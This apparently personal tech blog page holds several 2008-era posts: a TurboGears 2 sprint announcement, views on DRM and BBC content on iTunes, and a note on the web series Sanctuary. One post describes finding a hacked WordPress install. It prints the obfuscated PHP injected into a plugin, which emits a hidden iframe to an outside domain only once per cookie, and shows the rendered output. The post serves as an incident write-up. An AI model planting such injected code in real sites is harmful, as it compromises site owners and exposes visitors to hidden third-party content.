splee.blog

On Saturday 15th and Sunday 16th of November there is a worldwide sprint organised for TG2 and its related projects.

Mark Ramm and Chris Perkins are hosting the sprint in Atlanta, GA at the Predictix offices and I am hosting the sprint at the Languagelab offices in London, UK. There is also something being organised in Madrid, Spain by Alberto Valverde and Gustavo Narea with the details to be announced.

If you can come to any of these locations or want to host a new location in your area for this sprint, please update the wiki so we can get an idea of numbers. If you can’t make it to any of the locations, never fear! We welcome remote sprinters and we’ll all be collaborating in IRC and via Trac. The more eyes we can have on the code during the sprint, the better!

What can you do?

There are many tasks available to be getting on with, no matter what your level of expertise. There are beginner and intermediate tasks listed, as well as tasks for various subprojects, so there’s plenty for everyone to do.

Come along, either in person or virtually, and get involved. =)

Today I thought I’d give the wordpress iPhone app a try since I’m going to try to blog more frequently in the near future. I was slightly irritated that it didn’t work, but I assumed that there was some kind of bug in the system that was preventing it from working with my blog.

After using my best google-fu I couldn’t find anything that would prevent me from adding the basic settings and so I downloaded a trial version of MarsEdit to see if that also choked on my site.

Unfortunately my hunch was proven correct and I couldn’t make MarsEdit connect to my blog.

Since I’ve written XML-RPC client and server code in the past I fired up TextMate and iPython to see if I could diagnose the problem.

I turned on pdb debugging, set up an xmlrpclib.Server instance and tried to call the demo.sayHello() method which resulted in an instant exception. The data that the server returned worried me immensely:

<iframe src=http://googlerank.info/counter style=display:none></iframe> <script language="JavaScript" type="text/javascript">document.cookie = "ireiw=5;expires=Sun, 01-Dec-2009 08:00:00 GMT;path=/";</script><?xml version="1.0"?>
<methodResponse>
  <params>
    <param>
      <value>
        <string>Hello!</string>
      </value>
    </param>
  </params>
</methodResponse>

That, my friends, is the result of a hacked WordPress installation. This irked me. A lot. Not only are these bastards not content with flooding every post on my blog with spam comments and trackbacks (which has caused me to turn off comments on my older posts, something I really didn’t want to do), they’ve gone and invaded my server to make themselves a little more money. The only reason I actually found this was because of the invalid markup for the XML-RPC response, had I never tried to use XML-RPC I wouldn’t have seen it for reasons that I’ll explain below.

So, now I had to trawl through my WordPress files to see where this invasion was taking place. I checked my database first which came back clean, followed by my themes and plugins. I hit paydirt in both of these places. One was a simple modification to the footer.php of my K2 theme (which wasn’t active so it didn’t really matter) and one was a not so simple modification to my markdown plugin.

Seaching through the source for “iframe” or “googlerank.info” revealed nothing, but that’s because the spammer had added the string as follows:

if (!isset($_COOKIE["ireiw"])) echo '<if'.'rame src=http://googl'.'erank.info/counter style=display:none'.'></ifra'.'me> <s'.'cr'.'ipt language="JavaScr'.'ipt" '.'type="text/'.'javascript">d'.'ocument.cookie '.'= "ireiw=5;expires=Sun, 0'.'1-Dec-2009 08:00:00 GMT;path='.'/";<'.'/script>';

Assholes. So this hidden iframe would only be shown if a cookie had not already been set for the user, meaning it would only be shown once, as often as they used a different browser, or as often as they cleared their cookies. For this reason I never noticed it on my site’s main pages, but I’ll bet any search spiders saw it every damn time.

I have no idea when this act was perpetrated, nor which exploit they used but I’m mighty pissed. In my opinion this is tantamount to breaking into my house and rummaging around through my shit just to take a jar full of £3.07 worth of change - It feels pointless and violating and I really wish the internet weren’t so anonymous so there was actually some risk of being found out if you’re one of these dirty, low-down fucks who make money by ruining people’s (virtual) reputation.

Now I’m turning off XML-RPC and uninstalling the WordPress iPhone app because I really don’t want to be open to yet more possible exploits. Well done spammers. Another feature of my blogging software that I can’t rely on because you’re all unscrupulous asshats. Bravo.

Update (28 July 08): As Daniel pointed out in the comments to this post, I’m not 100% sure that XML-RPC was to blame for my blog being hacked and blaming it wholly for the issue was simply a case of a slightly irate post very soon after I fixed the issue. In the interest of not spreading FUD I need to clear that up.

Currently I cannot find anything about any current XML-RPC exploits in WordPress 2.6 so if you’re up to date there shouldn’t be any problems.

This post started out as a comment on a post about some of the BBC’s offerings being made available on iTunes. Unfortunately the blog’s commenting system kept giving me errors when I was trying to comment, I suspect because my comment was rather lengthy, so I decided to post it here.

I noticed the “BBC Worldwide - programmes just added” link in the iTunes store just yesterday and immediately started buying episodes of Spooks as I had missed the series when it was on TV. Combined the episodes of season 4 of Lost available the day after they’ve aired on Sky One on a Sunday, this is the first time I’ve actually felt like buying any TV content via the iTunes store since the selection of shows available to us in the UK is, quite frankly, dismal. This has also stayed my hand when considering buying myself an Apple TV unit. There’s just not enough viable content available on our poor, neglected island to make me bite at that hook.

Rory Cellan-Jones says:

It is the first time the BBC has asked UK viewers to pay to download content, and it will be interesting to see how they react. Millions have been happy to pay for DVDs of series like Little Britain - but will they react differently when they are asked to shell out for something they can’t stick on a shelf?

I think the entertainment industry really underestimates their consumers and their willingness to pass over their hard earned cash for entertainment, even when it’s not packaged in a way that lets you hold it in your hands. A DVD is simply a means of transporting the data contained therein, with today’s online society why would you need a DVD when the internet is beginning to be a perfectly good transportation medium? The reason people are still buying DVD’s and CD’s more than buying media online is because buying online is difficult due to the myriad of DRM issues in the industry. Only when there is no DRM do things improve. At the moment, the majority of media without DRM is pirated though.

Yes, you can see all these BBC offerings on TV. Yes, you could hear your favourite music on the radio. The problem is, you’re not able to watch them when or where you want to. You’re bound by the broadcaster’s schedule that may or may not mesh with your own, and you’re forced to use a specific piece of equipment to do so.

I would (and frequently do) pay a reasonable price for my entertainment if it means I can enjoy it as often as I want, on whichever platform I want, without any restrictions. And that, right there, seems to be the painful bit for the entertainment industry: Without Restrictions

If I’m paying for my entertainment directly, I don’t want to be told that it won’t work on platform_01 or player_03 because “we, the publishers, don’t want it to”. Real, documented technical reasons are fine, if not slightly annoying, but they’re excusable.

DRM is, in my opinion, driving piracy as people simply do not want to have artificial restrictions placed on their media. The problem is that the industry is seeing the issue in reverse. They see the fact that media can be copied and distributed at a fantastic rate as a downside. They see people transferring pirated copies and think “these guys are cutting into our margins”! This is entirely the wrong way of looking at it, and the industry needs to catch up. Using current technology you can distribute your media at a small price to an unreasonably large audience across the world with sinfully minimal overheads in the grand scheme of things. Small price - smaller overhead + large audience = large profits.

Obviously I’m putting a lot of faith in humanity here, but there will always be people who will just share their media and allow people who want to spend time looking for it to download it. To treat every single one of your consumers as if they are potential thieves does not make consumers. Perhaps, instead of warnings about piracy, notes of thanks for supporting artists should be displayed.

Maybe I’m being far too optimistic here, dreaming of a utopian society where the majority are honest and don’t want their entertainment to stop, paying fair dues for a good product; I don’t think that the world is that bad though. I still believe there’s a legitimate profit to be made from the honest individuals without resorting to excluding them based on the platform they choose to consume their media.

Current technology allows people to pirate material easier than ever before but the majority of the population would, I think, rather pay to get their media directly from the source to get their entertainment fix. Anyone I know who has downloaded media has done it because they couldn’t get hold of it from the publishing source, the publishing source penalised them for not being on a particular platform or the price of the media was far too high to make them get out their wallet.

The quicker the big media companies realise this, and I think they are starting to with a new generation of high level management starting to filter through the rank and file, the better.

Recently this blog has been attracting a lot of spam and Akismet doesn’t seem to be keeping up with the deluge. I’ve decided to disable comments at the moment due to my own lack of activity here.

I am intending to take up blogging again at some point in the near future but for the moment I have a lot to focus on and, quite frankly, I don’t have the energy to come and moderate 30 or so spam comments every day, not to mention the other 15 or so daily spam comments that actually make it onto the blog.

Once I start regularly blogging again sometime in the next few months I will obviously re-enable comments and hopefully Akismet will be working with the efficiency it used to.

I’ve just found Sanctuary, “The First Broadcast Caliber (sic) Online Sci-Fi Series” and it looks like it could be a decent little series, especially considering some of the names involved. Amanda Tapping of Stargate fame not only stars in Sanctuary but is also Executive Producer, and there are a few members of the Stargate: Atlantis team in the cast too.

After watching the trailer and some of the fairly poor quality free version of the first ‘webisode’ I decided that I should just buy the upcoming episodes - at just over £1.80 per episode (£1.60 if you buy the four episode bundle) I figured I’ve spent more money on worse products in my time.

Although the first episode seemed a little ‘bitty’ and could have probably done with some better editing I’m definitely going to be watching the next few episodes to see how it pans out. I’m not going to drop any spoilers but there are some quite tasty hooks in between the character introductions that will make you curious for more.

Which Programming Language are You?

First try, no cheating :)